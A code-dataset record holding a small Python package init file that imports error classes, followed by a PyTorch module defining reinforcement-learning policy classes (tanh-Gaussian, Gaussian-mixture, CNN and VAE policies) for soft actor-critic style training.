rahagi/gacha-elper
|
e81bd82c3416a01e448ba1ce2515252235facdac
|
[
"MIT"
] | null | null | null |
gacha_elper/error/__init__.py
|
rahagi/gacha-elper
|
e81bd82c3416a01e448ba1ce2515252235facdac
|
[
"MIT"
] | null | null | null |
gacha_elper/error/__init__.py
|
rahagi/gacha-elper
|
e81bd82c3416a01e448ba1ce2515252235facdac
|
[
"MIT"
] | null | null | null |
from .adb_not_found import *
from .adb_no_devices import *
from .elper_invalid_find_mode import *
from .elper_invalid_similarity_range import *
from .elper_invalid_crop_bounding_box import *
| 31.833333
| 46
| 0.842932
| 29
| 191
| 5.068966
| 0.551724
| 0.272109
| 0.306122
| 0.44898
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104712
| 191
| 5
| 47
| 38.2
| 0.859649
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
d2f6d0bcddafd1b32dcf43212757cbee60c7632a
| 34,580
|
py
|
Python
|
railrl/torch/sac/policies.py
|
Asap7772/rail-rl-franka-eval
|
4bf99072376828193d05b53cf83c7e8f4efbd3ba
|
[
"MIT"
] | null | null | null |
railrl/torch/sac/policies.py
|
Asap7772/rail-rl-franka-eval
|
4bf99072376828193d05b53cf83c7e8f4efbd3ba
|
[
"MIT"
] | null | null | null |
railrl/torch/sac/policies.py
|
Asap7772/rail-rl-franka-eval
|
4bf99072376828193d05b53cf83c7e8f4efbd3ba
|
[
"MIT"
] | null | null | null |
import numpy as np
import torch
from torch import nn as nn
from railrl.policies.base import ExplorationPolicy, Policy
from railrl.torch.core import eval_np
from railrl.torch.distributions import TanhNormal, Normal, GaussianMixture
from railrl.torch.networks import Mlp, CNN
from railrl.torch.vae.vae_base import GaussianLatentVAE
import railrl.torch.pytorch_util as ptu
import torch.nn.functional as F
LOG_SIG_MAX = 2
LOG_SIG_MIN = -20
class TanhGaussianPolicyAdapter(nn.Module, ExplorationPolicy):
"""
Usage:
```
obs_processor = ...
policy = TanhGaussianPolicyAdapter(obs_processor)
```
"""
def __init__(
self,
obs_processor,
obs_processor_output_dim,
action_dim,
hidden_sizes,
):
super().__init__()
self.obs_processor = obs_processor
self.obs_processor_output_dim = obs_processor_output_dim
self.mean_and_log_std_net = Mlp(
hidden_sizes=hidden_sizes,
output_size=action_dim*2,
input_size=obs_processor_output_dim,
)
self.action_dim = action_dim
def get_action(self, obs_np, deterministic=False):
actions = self.get_actions(obs_np[None], deterministic=deterministic)
return actions[0, :], {}
def get_actions(self, obs_np, deterministic=False):
return eval_np(self, obs_np, deterministic=deterministic)[0]
def forward(
self,
obs,
reparameterize=True,
deterministic=False,
return_log_prob=False,
return_entropy=False,
return_log_prob_of_mean=False,
):
"""
:param obs: Observation
:param deterministic: If True, do not sample
:param return_log_prob: If True, return a sample and its log probability
:param return_entropy: If True, return the true expected log
prob. Will not need to be differentiated through, so this can be a
number.
:param return_log_prob_of_mean: If True, return the true expected log
prob. Will not need to be differentiated through, so this can be a
number.
"""
h = self.obs_processor(obs)
h = self.mean_and_log_std_net(h)
mean, log_std = torch.split(h, self.action_dim, dim=1)
log_std = torch.clamp(log_std, LOG_SIG_MIN, LOG_SIG_MAX)
std = torch.exp(log_std)
log_prob = None
entropy = None
mean_action_log_prob = None
pre_tanh_value = None
tanh_normal = TanhNormal(mean, std)
if deterministic:
action = torch.tanh(mean)
else:
tanh_normal = TanhNormal(mean, std)
if return_log_prob:
if reparameterize is True:
action, pre_tanh_value = tanh_normal.rsample(
return_pretanh_value=True
)
else:
action, pre_tanh_value = tanh_normal.sample(
return_pretanh_value=True
)
log_prob = tanh_normal.log_prob(
action,
pre_tanh_value=pre_tanh_value
)
log_prob = log_prob.sum(dim=1, keepdim=True)
else:
if reparameterize is True:
action = tanh_normal.rsample()
else:
action = tanh_normal.sample()
if return_entropy:
entropy = log_std + 0.5 + np.log(2 * np.pi) / 2
# I'm not sure how to compute the (differential) entropy for a
# tanh(Gaussian)
entropy = entropy.sum(dim=1, keepdim=True)
raise NotImplementedError()
if return_log_prob_of_mean:
tanh_normal = TanhNormal(mean, std)
mean_action_log_prob = tanh_normal.log_prob(
torch.tanh(mean),
pre_tanh_value=mean,
)
mean_action_log_prob = mean_action_log_prob.sum(dim=1, keepdim=True)
return (
action, mean, log_std, log_prob, entropy, std,
mean_action_log_prob, pre_tanh_value, tanh_normal
)
def log_prob_aviral(self, obs, actions):
def atanh(x):
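# the clamps keep both log arguments strictly positive when tanh saturates at +/-1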
one_plus_x = (1 + x).clamp(min=1e-6)
one_minus_x = (1 - x).clamp(min=1e-6)
return 0.5 * torch.log(one_plus_x / one_minus_x)
raw_actions = atanh(actions)
h = self.obs_processor(obs)
h = self.mean_and_log_std_net(h)
mean, log_std = torch.split(h, self.action_dim, dim=1)
log_std = torch.clamp(log_std, LOG_SIG_MIN, LOG_SIG_MAX)
std = torch.exp(log_std)
tanh_normal = TanhNormal(mean, std)
log_prob = tanh_normal.log_prob(value=actions, pre_tanh_value=raw_actions)
return log_prob.sum(-1)
# noinspection PyMethodOverriding
class TanhGaussianPolicy(Mlp, ExplorationPolicy):
"""
Usage:
```
policy = TanhGaussianPolicy(...)
action, mean, log_std, _ = policy(obs)
action, mean, log_std, _ = policy(obs, deterministic=True)
action, mean, log_std, log_prob = policy(obs, return_log_prob=True)
```
Here, mean and log_std are the mean and log_std of the Gaussian that is
sampled from.
If deterministic is True, action = tanh(mean).
If return_log_prob is False (default), log_prob = None
This is done because computing the log_prob can be a bit expensive.
"""
def __init__(
self,
hidden_sizes,
obs_dim,
action_dim,
std=None,
init_w=1e-3,
**kwargs
):
super().__init__(
hidden_sizes,
input_size=obs_dim,
output_size=action_dim,
init_w=init_w,
**kwargs
)
self.log_std = None
self.std = std
if std is None:
last_hidden_size = obs_dim
if len(hidden_sizes) > 0:
last_hidden_size = hidden_sizes[-1]
self.last_fc_log_std = nn.Linear(last_hidden_size, action_dim)
self.last_fc_log_std.weight.data.uniform_(-init_w, init_w)
self.last_fc_log_std.bias.data.uniform_(-init_w, init_w)
else:
self.log_std = np.log(std)
assert LOG_SIG_MIN <= self.log_std <= LOG_SIG_MAX
def get_action(self, obs_np, deterministic=False):
actions = self.get_actions(obs_np[None], deterministic=deterministic)
return actions[0, :], {}
def get_actions(self, obs_np, deterministic=False):
return eval_np(self, obs_np, deterministic=deterministic)[0]
def forward(
self,
obs,
reparameterize=True,
deterministic=False,
return_log_prob=False,
return_entropy=False,
return_log_prob_of_mean=False,
):
"""
:param obs: Observation
:param deterministic: If True, do not sample
:param return_log_prob: If True, return a sample and its log probability
:param return_entropy: If True, return the true expected log
prob. Will not need to be differentiated through, so this can be a
number.
:param return_log_prob_of_mean: If True, return the true expected log
prob. Will not need to be differentiated through, so this can be a
number.
"""
h = obs
for i, fc in enumerate(self.fcs):
h = self.hidden_activation(fc(h))
mean = self.last_fc(h)
if self.std is None:
log_std = self.last_fc_log_std(h)
log_std = torch.clamp(log_std, LOG_SIG_MIN, LOG_SIG_MAX)
std = torch.exp(log_std)
else:
std = torch.from_numpy(np.array([self.std, ])).float().to(ptu.device)
log_std = torch.log(std) # self.log_std
log_prob = None
entropy = None
mean_action_log_prob = None
pre_tanh_value = None
tanh_normal = TanhNormal(mean, std)
if deterministic:
action = torch.tanh(mean)
else:
tanh_normal = TanhNormal(mean, std)
if return_log_prob:
if reparameterize is True:
action, pre_tanh_value = tanh_normal.rsample(
return_pretanh_value=True
)
else:
action, pre_tanh_value = tanh_normal.sample(
return_pretanh_value=True
)
log_prob = tanh_normal.log_prob(
action,
pre_tanh_value=pre_tanh_value
)
log_prob = log_prob.sum(dim=1, keepdim=True)
else:
if reparameterize is True:
action = tanh_normal.rsample()
else:
action = tanh_normal.sample()
if return_entropy:
entropy = log_std + 0.5 + np.log(2 * np.pi) / 2
# I'm not sure how to compute the (differential) entropy for a
# tanh(Gaussian)
entropy = entropy.sum(dim=1, keepdim=True)
raise NotImplementedError()
if return_log_prob_of_mean:
tanh_normal = TanhNormal(mean, std)
mean_action_log_prob = tanh_normal.log_prob(
torch.tanh(mean),
pre_tanh_value=mean,
)
mean_action_log_prob = mean_action_log_prob.sum(dim=1, keepdim=True)
return (
action, mean, log_std, log_prob, entropy, std,
mean_action_log_prob, pre_tanh_value, tanh_normal
)
def logprob(self, action, mean, std):
# import ipdb; ipdb.set_trace()
tanh_normal = TanhNormal(mean, std)
log_prob = tanh_normal.log_prob(
action,
)
log_prob = log_prob.sum(dim=1, keepdim=True)
return log_prob
def log_prob_aviral(self, obs, actions):
def atanh(x):
one_plus_x = (1 + x).clamp(min=1e-6)
one_minus_x = (1 - x).clamp(min=1e-6)
return 0.5 * torch.log(one_plus_x / one_minus_x)
raw_actions = atanh(actions)
h = obs
for i, fc in enumerate(self.fcs):
h = self.hidden_activation(fc(h))
mean = self.last_fc(h)
if self.std is None:
log_std = self.last_fc_log_std(h)
log_std = torch.clamp(log_std, LOG_SIG_MIN, LOG_SIG_MAX)
std = torch.exp(log_std)
else:
std = self.std
log_std = self.log_std
tanh_normal = TanhNormal(mean, std)
log_prob = tanh_normal.log_prob(value=actions, pre_tanh_value=raw_actions)
return log_prob.sum(-1)
class GaussianPolicy(Mlp, ExplorationPolicy):
def __init__(
self,
hidden_sizes,
obs_dim,
action_dim,
std=None,
init_w=1e-3,
min_log_std=None,
max_log_std=None,
std_architecture="shared",
**kwargs
):
super().__init__(
hidden_sizes,
input_size=obs_dim,
output_size=action_dim,
init_w=init_w,
output_activation=torch.tanh,
**kwargs
)
self.min_log_std = min_log_std
self.max_log_std = max_log_std
self.log_std = None
self.std = std
self.std_architecture = std_architecture
if std is None:
if self.std_architecture == "shared":
last_hidden_size = obs_dim
if len(hidden_sizes) > 0:
last_hidden_size = hidden_sizes[-1]
self.last_fc_log_std = nn.Linear(last_hidden_size, action_dim)
self.last_fc_log_std.weight.data.uniform_(-init_w, init_w)
self.last_fc_log_std.bias.data.uniform_(-init_w, init_w)
elif self.std_architecture == "values":
self.log_std_logits = nn.Parameter(ptu.zeros(action_dim, requires_grad=True))
else:
raise ValueError(f"unknown std_architecture: {self.std_architecture}")
else:
self.log_std = np.log(std)
assert LOG_SIG_MIN <= self.log_std <= LOG_SIG_MAX
def get_action(self, obs_np, deterministic=False):
actions = self.get_actions(obs_np[None], deterministic=deterministic)
return actions[0, :], {}
def get_actions(self, obs_np, deterministic=False):
return eval_np(self, obs_np, deterministic=deterministic)[0]
def forward(
self,
obs,
reparameterize=True,
deterministic=False,
return_log_prob=False,
return_entropy=False,
return_log_prob_of_mean=False,
):
"""
:param obs: Observation
:param deterministic: If True, do not sample
:param return_log_prob: If True, return a sample and its log probability
:param return_entropy: If True, return the true expected log
prob. Will not need to be differentiated through, so this can be a
number.
:param return_log_prob_of_mean: If True, return the true expected log
prob. Will not need to be differentiated through, so this can be a
number.
"""
h = obs
for i, fc in enumerate(self.fcs):
h = self.hidden_activation(fc(h))
preactivation = self.last_fc(h)
mean = self.output_activation(preactivation)
if self.std is None:
# log_std = self.last_fc_log_std(h)
# log_std = torch.clamp(log_std, LOG_SIG_MIN, LOG_SIG_MAX)
if self.std_architecture == "shared":
log_std = torch.sigmoid(self.last_fc_log_std(h))
elif self.std_architecture == "values":
log_std = torch.sigmoid(self.log_std_logits)
else:
raise ValueError(f"unknown std_architecture: {self.std_architecture}")
log_std = self.min_log_std + log_std * (self.max_log_std - self.min_log_std)
std = torch.exp(log_std)
else:
std = torch.from_numpy(np.array([self.std, ])).float().to(ptu.device)
log_std = torch.log(std) # self.log_std
log_prob = None
entropy = None
mean_action_log_prob = None
pre_tanh_value = None
normal = Normal(mean, std)
if deterministic:
action = mean
else:
if return_log_prob:
if reparameterize is True:
action = normal.rsample()
else:
action = normal.sample()
log_prob = normal.log_prob(action)
log_prob = log_prob.sum(dim=1, keepdim=True)
else:
if reparameterize is True:
action = normal.rsample()
else:
action = normal.sample()
if return_entropy:
entropy = log_std + 0.5 + np.log(2 * np.pi) / 2
# I'm not sure how to compute the (differential) entropy for a
# tanh(Gaussian)
entropy = entropy.sum(dim=1, keepdim=True)
raise NotImplementedError()
if return_log_prob_of_mean:
normal = Normal(mean, std)
mean_action_log_prob = normal.log_prob(mean)
mean_action_log_prob = mean_action_log_prob.sum(dim=1, keepdim=True)
return (
action, mean, log_std, log_prob, entropy, std,
mean_action_log_prob, pre_tanh_value, normal,
)
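# Usage sketch (illustrative, not part of the original API; the dimensions
# below are assumptions). Note that when std is None, min_log_std and
# max_log_std must be given: the sigmoid output is mapped into
# [min_log_std, max_log_std] rather than clamped.
def _example_gaussian_policy_usage():
    policy = GaussianPolicy(
        hidden_sizes=[256, 256],
        obs_dim=17,
        action_dim=6,
        min_log_std=-6,
        max_log_std=0,
        std_architecture="shared",
    )
    policy.to(ptu.device)
    obs = ptu.zeros(1, 17)
    # With deterministic=True the returned action is the tanh-squashed mean.
    action, mean, log_std, *_ = policy(obs, deterministic=True)
    return action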
class GaussianMixturePolicy(Mlp, ExplorationPolicy):
def __init__(
self,
hidden_sizes,
obs_dim,
action_dim,
std=None,
init_w=1e-3,
min_log_std=None,
max_log_std=None,
num_gaussians=1,
std_architecture="shared",
**kwargs
):
super().__init__(
hidden_sizes,
input_size=obs_dim,
output_size=action_dim * num_gaussians,
init_w=init_w,
# output_activation=torch.tanh,
**kwargs
)
self.action_dim = action_dim
self.num_gaussians = num_gaussians
self.min_log_std = min_log_std
self.max_log_std = max_log_std
self.log_std = None
self.std = std
self.std_architecture = std_architecture
        last_hidden_size = obs_dim
        if len(hidden_sizes) > 0:
            last_hidden_size = hidden_sizes[-1]
        # last_hidden_size is computed before this branch because
        # last_fc_weights below needs it even when a fixed std is given.
        if std is None:
if self.std_architecture == "shared":
self.last_fc_log_std = nn.Linear(last_hidden_size, action_dim * num_gaussians)
self.last_fc_log_std.weight.data.uniform_(-init_w, init_w)
self.last_fc_log_std.bias.data.uniform_(-init_w, init_w)
elif self.std_architecture == "values":
self.log_std_logits = nn.Parameter(ptu.zeros(action_dim * num_gaussians, requires_grad=True))
else:
                raise ValueError(f"unknown std_architecture: {self.std_architecture}")
else:
self.log_std = np.log(std)
assert LOG_SIG_MIN <= self.log_std <= LOG_SIG_MAX
self.last_fc_weights = nn.Linear(last_hidden_size, num_gaussians)
self.last_fc_weights.weight.data.uniform_(-init_w, init_w)
self.last_fc_weights.bias.data.uniform_(-init_w, init_w)
def get_action(self, obs_np, deterministic=False):
actions = self.get_actions(obs_np[None], deterministic=deterministic)
return actions[0, :], {}
def get_actions(self, obs_np, deterministic=False):
return eval_np(self, obs_np, deterministic=deterministic)[0]
def forward(
self,
obs,
reparameterize=True,
deterministic=False,
return_log_prob=False,
return_entropy=False,
return_log_prob_of_mean=False,
):
"""
:param obs: Observation
:param deterministic: If True, do not sample
:param return_log_prob: If True, return a sample and its log probability
        :param return_entropy: If True, also return the differential entropy
            of the action distribution. It will not need to be
            differentiated through, so it can be a plain number.
        :param return_log_prob_of_mean: If True, also return the log
            probability of the mean action. It will not need to be
            differentiated through, so it can be a plain number.
"""
h = obs
for i, fc in enumerate(self.fcs):
h = self.hidden_activation(fc(h))
preactivation = self.last_fc(h)
mean = self.output_activation(preactivation)
if self.std is None:
# log_std = self.last_fc_log_std(h)
# log_std = torch.clamp(log_std, LOG_SIG_MIN, LOG_SIG_MAX)
# log_std = torch.sigmoid(self.last_fc_log_std(h))
if self.std_architecture == "shared":
log_std = torch.sigmoid(self.last_fc_log_std(h))
elif self.std_architecture == "values":
log_std = torch.sigmoid(self.log_std_logits)
else:
                raise ValueError(f"unknown std_architecture: {self.std_architecture}")
log_std = self.min_log_std + log_std * (self.max_log_std - self.min_log_std)
std = torch.exp(log_std)
else:
            # Mirror GaussianPolicy: self.std is a scalar, so wrap it before
            # converting (torch.from_numpy fails on a bare float).
            std = torch.from_numpy(np.array([self.std, ])).float().to(ptu.device)
            log_std = torch.log(std)
        weights = F.softmax(self.last_fc_weights(h), dim=1).reshape(
            (-1, self.num_gaussians, 1))
        mixture_means = mean.reshape((-1, self.action_dim, self.num_gaussians, ))
        mixture_stds = std.reshape((-1, self.action_dim, self.num_gaussians, ))
        dist = GaussianMixture(mixture_means, mixture_stds, weights)
mean = dist.mean()
log_prob = None
entropy = None
mean_action_log_prob = None
if deterministic:
action = mean
else:
# normal = Normal(mean, std)
if return_log_prob:
if reparameterize is True:
action = dist.rsample()
else:
action = dist.sample()
log_prob = dist.log_prob(action)
else:
if reparameterize is True:
action = dist.rsample()
else:
action = dist.sample()
if return_entropy:
            entropy = log_std + 0.5 + np.log(2 * np.pi) / 2
            entropy = entropy.sum(dim=1, keepdim=True)
            # Left unimplemented in the original: the expression above is
            # only the per-component Gaussian term; a Gaussian mixture has
            # no closed-form differential entropy.
            raise NotImplementedError()
if return_log_prob_of_mean:
normal = Normal(mean, std)
mean_action_log_prob = normal.log_prob(mean)
mean_action_log_prob = mean_action_log_prob.sum(dim=1, keepdim=True)
return (
action, mean, log_std, log_prob, entropy, std,
mean_action_log_prob, None, dist,
)
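# Usage sketch (illustrative; dimensions and component count are
# assumptions). The last linear layer emits action_dim * num_gaussians
# means, and mixture weights come from the separate softmax head
# (last_fc_weights).
def _example_gaussian_mixture_policy_usage():
    policy = GaussianMixturePolicy(
        hidden_sizes=[256, 256],
        obs_dim=17,
        action_dim=6,
        num_gaussians=4,
        min_log_std=-6,
        max_log_std=0,
        std_architecture="shared",
    )
    policy.to(ptu.device)
    obs = ptu.zeros(1, 17)
    # With deterministic=True the returned action is the mixture mean.
    action, mean, log_std, *_ = policy(obs, deterministic=True)
    return action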
class GaussianMixtureObsProcessorPolicy(GaussianMixturePolicy):
def __init__(self, obs_processor, *args, **kwargs):
super().__init__(*args, **kwargs)
self.obs_processor = obs_processor
def forward(self, obs, *args, **kwargs):
h_obs = self.obs_processor(obs)
return super().forward(h_obs, *args, **kwargs)
class TanhGaussianObsProcessorPolicy(TanhGaussianPolicy):
def __init__(self, obs_processor, *args, **kwargs):
super().__init__(*args, **kwargs)
self.pre_obs_dim = obs_processor.input_size
self.pre_goal_dim = obs_processor.input_size
self.obs_processor = obs_processor
def forward(self, obs, *args, **kwargs):
obs_and_goal = obs
assert obs_and_goal.shape[1] == self.pre_obs_dim + self.pre_goal_dim
obs = obs_and_goal[:, :self.pre_obs_dim]
goal = obs_and_goal[:, self.pre_obs_dim:]
h_obs = self.obs_processor(obs)
h_goal = self.obs_processor(goal)
flat_inputs = torch.cat((h_obs, h_goal), dim=1)
return super().forward(flat_inputs, *args, **kwargs)
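# Usage sketch (illustrative): the wrapper assumes the incoming tensor is a
# flat concatenation [obs, goal], each half sized obs_processor.input_size:
#
#     obs_and_goal = torch.cat((obs, goal), dim=1)
#     action = policy(obs_and_goal)[0]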
# noinspection PyMethodOverriding
class TanhCNNGaussianPolicy(CNN, ExplorationPolicy):
"""
Usage:
```
    policy = TanhCNNGaussianPolicy(...)
action, mean, log_std, _ = policy(obs)
action, mean, log_std, _ = policy(obs, deterministic=True)
action, mean, log_std, log_prob = policy(obs, return_log_prob=True)
```
Here, mean and log_std are the mean and log_std of the Gaussian that is
sampled from.
If deterministic is True, action = tanh(mean).
If return_log_prob is False (default), log_prob = None
This is done because computing the log_prob can be a bit expensive.
"""
def __init__(
self,
std=None,
init_w=1e-3,
**kwargs
):
super().__init__(
init_w=init_w,
**kwargs
)
obs_dim = self.input_width * self.input_height
action_dim = self.output_size
self.log_std = None
self.std = std
if std is None:
last_hidden_size = obs_dim
if len(self.hidden_sizes) > 0:
last_hidden_size = self.hidden_sizes[-1]
self.last_fc_log_std = nn.Linear(last_hidden_size, action_dim)
self.last_fc_log_std.weight.data.uniform_(-init_w, init_w)
self.last_fc_log_std.bias.data.uniform_(-init_w, init_w)
else:
self.log_std = np.log(std)
assert LOG_SIG_MIN <= self.log_std <= LOG_SIG_MAX
def get_action(self, obs_np, deterministic=False):
actions = self.get_actions(obs_np[None], deterministic=deterministic)
return actions[0, :], {}
def get_actions(self, obs_np, deterministic=False):
return eval_np(self, obs_np, deterministic=deterministic)[0]
def forward(
self,
obs,
reparameterize=True,
deterministic=False,
return_log_prob=False,
return_entropy=False,
return_log_prob_of_mean=False,
):
"""
:param obs: Observation
:param deterministic: If True, do not sample
:param return_log_prob: If True, return a sample and its log probability
        :param return_entropy: If True, also return the differential entropy
            of the action distribution. It will not need to be
            differentiated through, so it can be a plain number.
        :param return_log_prob_of_mean: If True, also return the log
            probability of the mean action. It will not need to be
            differentiated through, so it can be a plain number.
"""
h = super().forward(obs, return_last_activations=True)
mean = self.last_fc(h)
if self.std is None:
log_std = self.last_fc_log_std(h)
log_std = torch.clamp(log_std, LOG_SIG_MIN, LOG_SIG_MAX)
std = torch.exp(log_std)
else:
std = self.std
log_std = self.log_std
log_prob = None
entropy = None
mean_action_log_prob = None
pre_tanh_value = None
if deterministic:
action = torch.tanh(mean)
else:
tanh_normal = TanhNormal(mean, std)
if return_log_prob:
if reparameterize is True:
action, pre_tanh_value = tanh_normal.rsample(
return_pretanh_value=True
)
else:
action, pre_tanh_value = tanh_normal.sample(
return_pretanh_value=True
)
log_prob = tanh_normal.log_prob(
action,
pre_tanh_value=pre_tanh_value
)
log_prob = log_prob.sum(dim=1, keepdim=True)
else:
if reparameterize is True:
action = tanh_normal.rsample()
else:
action = tanh_normal.sample()
if return_entropy:
            # Gaussian entropy term: log_std + (1 + log(2 * pi)) / 2.
            entropy = log_std + 0.5 + np.log(2 * np.pi) / 2
            entropy = entropy.sum(dim=1, keepdim=True)
            # Left unimplemented in the original: it is unclear how to
            # compute the differential entropy for a tanh(Gaussian).
            raise NotImplementedError()
if return_log_prob_of_mean:
tanh_normal = TanhNormal(mean, std)
mean_action_log_prob = tanh_normal.log_prob(
torch.tanh(mean),
pre_tanh_value=mean,
)
mean_action_log_prob = mean_action_log_prob.sum(dim=1, keepdim=True)
return (
action, mean, log_std, log_prob, entropy, std,
mean_action_log_prob, pre_tanh_value,
)
class VAEPolicy(Mlp, ExplorationPolicy):
def __init__(
self,
hidden_sizes,
obs_dim,
action_dim,
latent_dim,
std=None,
init_w=1e-3,
**kwargs
):
super().__init__(
hidden_sizes,
input_size=obs_dim,
output_size=action_dim,
init_w=init_w,
**kwargs
)
self.latent_dim = latent_dim
self.e1 = torch.nn.Linear(obs_dim + action_dim, 750)
self.e2 = torch.nn.Linear(750, 750)
self.mean = torch.nn.Linear(750, self.latent_dim)
self.log_std = torch.nn.Linear(750, self.latent_dim)
self.d1 = torch.nn.Linear(obs_dim + self.latent_dim, 750)
self.d2 = torch.nn.Linear(750, 750)
self.d3 = torch.nn.Linear(750, action_dim)
self.max_action = 1.0
def get_action(self, obs_np, deterministic=False):
actions = self.get_actions(obs_np[None], deterministic=deterministic)
return actions[0, :], {}
def get_actions(self, obs_np, deterministic=False):
return eval_np(self, obs_np, deterministic=deterministic,
execute_actions=True)[0]
def forward(self, state, action):
z = F.relu(self.e1(torch.cat([state, action], 1)))
z = F.relu(self.e2(z))
mean = self.mean(z)
# Clamped for numerical stability
log_std = self.log_std(z).clamp(-4, 15)
std = torch.exp(log_std)
z = mean + std * ptu.from_numpy(
np.random.normal(0, 1, size=(std.size())))
u = self.decode(state, z)
return u, mean, std
def decode(self, state, z=None):
if z is None:
z = ptu.from_numpy(np.random.normal(0, 1, size=(
state.size(0), self.latent_dim))).clamp(-0.5, 0.5)
a = F.relu(self.d1(torch.cat([state, z], 1)))
a = F.relu(self.d2(a))
return torch.tanh(self.d3(a))
def decode_multiple(self, state, z=None, num_decode=10):
if z is None:
z = ptu.from_numpy(np.random.normal(0, 1, size=(
state.size(0), num_decode, self.latent_dim))).clamp(-0.5, 0.5)
a = F.relu(self.d1(torch.cat(
[state.unsqueeze(0).repeat(num_decode, 1, 1).permute(1, 0, 2), z],
2)))
a = F.relu(self.d2(a))
return torch.tanh(self.d3(a)), self.d3(a)
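# Usage sketch (illustrative; batch size and dimensions are assumptions):
# one reconstruction pass, then BCQ-style candidate-action decoding.
def _example_vae_policy_usage():
    vae = VAEPolicy(hidden_sizes=[], obs_dim=17, action_dim=6, latent_dim=12)
    vae.to(ptu.device)
    state = ptu.zeros(4, 17)
    action = ptu.zeros(4, 6)
    # Encode (state, action) to a latent, then decode it back to an action.
    recon, mean, std = vae(state, action)
    # Ten candidate actions per state, each decoded from a latent clipped
    # to [-0.5, 0.5]; shape (4, 10, 6).
    candidates, _ = vae.decode_multiple(state, num_decode=10)
    return recon, candidates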
class ConvVAEPolicy(GaussianLatentVAE, ExplorationPolicy):
"""Conv vae policy"""
def __init__(self, representation_size, architecture, action_dim,
encoder_class=CNN,
input_channels=1, imsize=48, init_w=1e-3, min_variance=1e-3,
hidden_init=ptu.fanin_init):
super().__init__(representation_size)
if min_variance is None:
self.log_min_variance = None
else:
self.log_min_variance = float(np.log(min_variance))
self.latent_dim = representation_size #FIXME(avi) Temp hack
self.input_channels = input_channels
self.imsize = imsize
self.imlength = self.imsize * self.imsize * self.input_channels
        # deconv_args also describes a convnet here: this policy's decoder
        # runs a convnet over the observation rather than a deconvnet.
conv_args, deconv_args = architecture['conv_args'], \
architecture['deconv_args']
conv_output_size = deconv_args['deconv_input_width'] * \
deconv_args['deconv_input_height'] * \
deconv_args['deconv_input_channels']
# This is just for the image state encoder
self.encoder = encoder_class(
**conv_args,
output_size=conv_output_size,
init_w=init_w,
hidden_init=hidden_init,
)
# Now we encode the actions as well
self.action_encoder1 = torch.nn.Linear(
self.encoder.output_size + action_dim, 750)
self.action_encoder2 = torch.nn.Linear(750, representation_size)
self.action_std_encoder = torch.nn.Linear(750, representation_size)
self.action_std_decoder = torch.nn.Linear(representation_size, 750)
self.action_encoder1.weight.data.uniform_(-init_w, init_w)
self.action_encoder2.weight.data.uniform_(-init_w, init_w)
self.action_std_decoder.weight.data.uniform_(-init_w, init_w)
self.action_encoder1.bias.data.uniform_(-init_w, init_w)
self.action_encoder2.bias.data.uniform_(-init_w, init_w)
self.action_std_encoder.bias.data.uniform_(-init_w, init_w)
# conv net for the observation input in the VAE decoder
self.decoder = encoder_class(
**conv_args,
output_size=conv_output_size,
init_w=init_w,
hidden_init=hidden_init,
)
# For finally decoding the action
self.action_decoder1 = torch.nn.Linear(
self.decoder.output_size + representation_size, 750)
self.action_decoder2 = torch.nn.Linear(750, 750)
self.action_decoder3 = torch.nn.Linear(750, action_dim)
self.representation_size = representation_size
self.action_dim = action_dim
def get_action(self, obs_np, deterministic=False):
actions = self.get_actions(obs_np[None], deterministic=deterministic)
return actions[0, :], {}
def get_actions(self, obs_np, deterministic=False):
return eval_np(self, obs_np, deterministic=deterministic,
execute_actions=True)[0]
def encode(self, input_obs, action):
h = F.relu(self.encoder(input_obs))
h_cat_action = torch.cat([h, action], dim=-1)
x = F.relu(self.action_encoder1(h_cat_action))
mu = self.action_encoder2(x)
log_std = self.action_std_encoder(x)
        if self.log_min_variance is not None:
            log_std = self.log_min_variance + log_std
return (mu, log_std)
def decode(self, state, z=None):
if z is None:
z = ptu.from_numpy(np.random.normal(0, 1, size=(
state.size(0), self.latent_dim))).clamp(-0.5, 0.5)
h = F.relu(self.decoder(state))
a = F.relu(self.action_decoder1(torch.cat([h, z], 1)))
a = F.relu(self.action_decoder2(a))
return torch.tanh(self.action_decoder3(a))
def forward(self, state, action):
mean, log_std = self.encode(state, action)
# Clamped for numerical stability
log_std = log_std.clamp(-4, 15)
std = torch.exp(log_std)
z = mean + std * ptu.from_numpy(
np.random.normal(0, 1, size=(std.size())))
u = self.decode(state, z)
return u, mean, std
def decode_multiple(self, state, z=None, num_decode=10):
if z is None:
z = ptu.from_numpy(np.random.normal(0, 1, size=(
state.size(0), num_decode, self.latent_dim))).clamp(-0.5, 0.5)
h = F.relu(self.decoder(state))
a = F.relu(self.action_decoder1(torch.cat(
[h.unsqueeze(0).repeat(num_decode, 1, 1).permute(1, 0, 2), z], 2)))
a = F.relu(self.action_decoder2(a))
return torch.tanh(self.action_decoder3(a)), self.action_decoder3(a)
def logprob(self, inputs, obs_distribution_params):
return None
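# Usage sketch (illustrative; the concrete values are assumptions, shown
# only to illustrate the conv_args/deconv_args layout read in __init__):
#
#     architecture = dict(
#         conv_args=dict(...),  # forwarded verbatim to encoder_class
#         deconv_args=dict(
#             deconv_input_width=3,
#             deconv_input_height=3,
#             deconv_input_channels=64,
#         ),
#     )
#     policy = ConvVAEPolicy(representation_size=16,
#                            architecture=architecture, action_dim=4)
#     recon, mean, std = policy(image_obs, action)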
class MakeDeterministic(Policy):
def __init__(self, stochastic_policy):
self.stochastic_policy = stochastic_policy
def get_action(self, *args, deterministic=False, **kwargs):
return self.stochastic_policy.get_action(
*args, deterministic=True, **kwargs
)
def to(self, device):
self.stochastic_policy.to(device)
def load_state_dict(self, stochastic_state_dict):
self.stochastic_policy.load_state_dict(stochastic_state_dict)
def state_dict(self):
return self.stochastic_policy.state_dict()
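# Usage sketch (illustrative; dimensions are assumptions): wrap any
# stochastic policy for evaluation so get_action always returns the
# deterministic (mean) action.
def _example_make_deterministic_usage():
    policy = GaussianPolicy(
        hidden_sizes=[64],
        obs_dim=17,
        action_dim=6,
        min_log_std=-6,
        max_log_std=0,
    )
    policy.to(ptu.device)
    eval_policy = MakeDeterministic(policy)
    action, agent_info = eval_policy.get_action(np.zeros(17, dtype=np.float32))
    return action, agent_info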
